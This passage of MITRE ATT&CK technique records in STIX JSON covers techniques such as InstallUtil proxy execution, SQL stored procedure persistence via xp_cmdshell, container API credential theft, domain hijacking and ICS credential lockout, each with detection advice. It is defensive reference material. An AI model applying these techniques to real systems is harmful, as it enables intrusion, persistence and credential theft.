encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "created": "2020-03-14T22:24:21.841Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1102/001", "external_id": "T1102.001"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "InstallUtil", "description": "InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft.\n\nAdversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Casey Smith", "Travis Smith, Tripwire"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_defense_bypassed": ["Process whitelisting", "Digital Certificate Validation"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b", "created": "2017-05-31T21:31:27.510Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1118", "external_id": "T1118"}, {"source_name": "MSDN InstallUtil", "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.", "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx"}, {"source_name": "LOLBAS Installutil", "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-02-02T20:10:01.862Z", "name": "Junk Data", "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "created": "2020-03-15T00:30:25.444Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1001/001", "external_id": "T1001.001"}, {"source_name": "FireEye SUNBURST Backdoor December 2020", "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.", "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Spearphishing Service", "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Robert Simmons, @MalwareUtkonos"], "x_mitre_detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", "created": "2020-10-02T17:08:07.742Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1598/001", "external_id": "T1598.001"}, {"source_name": "ThreatPost Social Media Phishing", "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.", "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-07-22T18:51:42.238Z", "name": "Commonly Used Port", "description": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", "created": "2017-05-31T21:30:42.657Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1043", "external_id": "T1043"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:13.719Z", "name": "Internet Accessible Device", "description": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.\n\nAdversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted. (Citation: NCCIC January 2014) These services may be discoverable through the use of online scanning tools. \n\nIn the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing. (Citation: NCCIC January 2014) (Citation: Danny Yadron December 2015) (Citation: Mark Thompson March 2016)\n\nIn Trend Micros manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access. (Citation: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Logon Session: Logon Session Metadata", "Network Traffic: Network Traffic Flow", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0883", "external_id": "T0883"}, {"source_name": "Danny Yadron December 2015", "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559"}, {"source_name": "Mark Thompson March 2016", "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/"}, {"source_name": "NCCIC January 2014", "description": "NCCIC 2014, January 1 Internet Accessible Control Systems At Risk Retrieved. 2019/11/07 ", "url": "https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf"}, {"source_name": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler", "description": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats Retrieved. 2021/04/12 ", "url": "https://documents.trendmicro.com/assets/white_papers/wp-caught-in-the-act-running-a-realistic-factory-honeypot-to-capture-real-threats.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Container API", "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Center for Threat-Informed Defense (CTID)", "Jay Chen, Palo Alto Networks", "Yossi Weizman, Azure Defender Research Team"], "x_mitre_deprecated": false, "x_mitre_detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436", "created": "2021-03-31T14:01:52.321Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/007", "external_id": "T1552.007"}, {"source_name": "Unit 42 Unsecured Docker Daemons", "description": "Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.", "url": "https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/"}, {"source_name": "Docker API", "description": "Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.", "url": "https://docs.docker.com/engine/api/v1.41/"}, {"source_name": "Kubernetes API", "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Domains", "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Jeremy Galloway"], "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", "created": "2020-10-01T00:51:28.513Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/001", "external_id": "T1584.001"}, {"source_name": "Krebs DNS Hijack 2019", "description": "Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.", "url": "https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/"}, {"source_name": "ICANNDomainNameHijacking", "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", "url": "https://www.icann.org/groups/ssac/documents/sac-007-en"}, {"source_name": "Palo Alto Unit 42 Domain Shadowing 2022", "description": "Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.", "url": "https://unit42.paloaltonetworks.com/domain-shadowing/"}, {"source_name": "Microsoft Sub Takeover 2020", "description": "Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.", "url": "https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "SQL Stored Procedures", "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Carlos Borges, @huntingneo, CIP", "Lucas da Silva Pereira, @vulcanunsec, CIP", "Kaspersky"], "x_mitre_detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "created": "2019-12-12T14:59:58.168Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1505/001", "external_id": "T1505.001"}, {"source_name": "NetSPI Startup Stored Procedures", "description": "Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server \u2013 Part 1: Startup Stored Procedures. Retrieved July 8, 2019.", "url": "https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/"}, {"source_name": "Kaspersky MSSQL Aug 2019", "description": "Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote attack on Microsoft SQL Server. Retrieved September 4, 2019.", "url": "https://securelist.com/malicious-tasks-in-ms-sql-server/92167/"}, {"source_name": "Microsoft xp_cmdshell 2017", "description": "Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved September 9, 2019.", "url": "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017"}, {"source_name": "Microsoft CLR Integration 2017", "description": "Microsoft. (2017, June 19). Common Language Runtime Integration. Retrieved July 8, 2019.", "url": "https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017"}, {"source_name": "NetSPI SQL Server CLR", "description": "Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019.", "url": "https://blog.netspi.com/attacking-sql-server-clr-assemblies/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-09T20:51:03.049Z", "name": "Data from Local System", "description": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.\n\nAdversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system. ", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["File: File Access", "Process: Process Creation", "Script: Script Execution", "Process: OS API Execution", "Command: Command Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "created": "2023-03-30T18:56:02.424Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0893", "external_id": "T0893"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Network Device Authentication", "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", "created": "2020-10-19T17:58:04.155Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/004", "external_id": "T1556.004"}, {"source_name": "Mandiant - Synful Knock", "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.", "url": "https://www.mandiant.com/resources/synful-knock-acis"}, {"source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7"}, {"source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:14.123Z", "name": "Change Credential", "description": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.\n\nAn adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device\u2019s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. \n\nAdditionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps.\n\n\nA chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021) \n", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Felix Eberstaller"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Operational Databases: Device Alarm", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "created": "2023-03-30T14:04:17.023Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0892", "external_id": "T0892"}, {"source_name": "German BAS Lockout Dec 2021", "description": "Kelly Jackson Higgins. (2021, December 20). Lights Out: Cyberattacks Shut Down Building Automation Systems. Retrieved March 30, 2023.", "url": "https://www.darkreading.com/attacks-breaches/lights-out-cyberattacks-shut-down-building-automation-systems"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T13:00:33.303Z", "name": "Disk Content Wipe", "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may 